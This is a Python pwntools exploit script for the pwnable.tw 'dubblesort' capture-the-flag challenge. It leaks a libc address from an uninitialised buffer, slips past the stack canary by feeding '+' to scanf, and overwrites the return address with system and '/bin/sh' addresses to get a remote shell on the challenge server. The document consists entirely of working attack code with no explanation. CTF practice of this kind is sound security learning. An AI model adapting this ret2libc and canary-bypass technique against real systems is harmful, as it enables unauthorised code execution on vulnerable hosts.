pwnable.tw dubblesort

attack_dubblesort.py

from pwn import *


libc = ELF('./libc.so.6')
binsh_addr = 0
for address in libc.search('/bin/sh\x00'):
    print(address)
    binsh_addr = address
    break

system_addr = libc.functions['system'].address

#p = process("./dubblesort", env={"LD_PRELOAD" : "./libc.so.6"})
p = remote('chall.pwnable.tw', 10101)
print("pid " + str(proc.pidof(p)))
#raw_input("waiting attach")
#gdb.attach(p, '''
#                break *(main+0xF0)''')

p.recvuntil("What your name :")
payload1 = 'A' * 27
payload1 += '\n'
p.send(payload1)
recvStr = p.recv()
print(recvStr)
addr = recvStr[34:38]
addr_num = u32(addr)
print("the leaked address is " + str(hex(addr_num)))

base_addr = addr_num - 0x1ae244
#print("system addr is ", system_addr)
system_addr2 = system_addr + base_addr
binsh_addr2 = binsh_addr + base_addr


ret_offset = 0x80
canary_offset = 0x60

#p.recvuntil(' sort :')
print('hello')
p.sendline('36')

for i in range(24):
    print(p.recvuntil('number :'))
    p.sendline('10')

print(p.recvuntil('number :'))
p.sendline('+')

for i in range(7):
    print(p.recvuntil('number :'))
    p.sendline(str(system_addr2))

p.recvuntil('number :')
p.sendline(str(system_addr2))
print("system address is " + str(system_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.recvuntil('number :')
p.sendline(str(binsh_addr2))
p.interactive()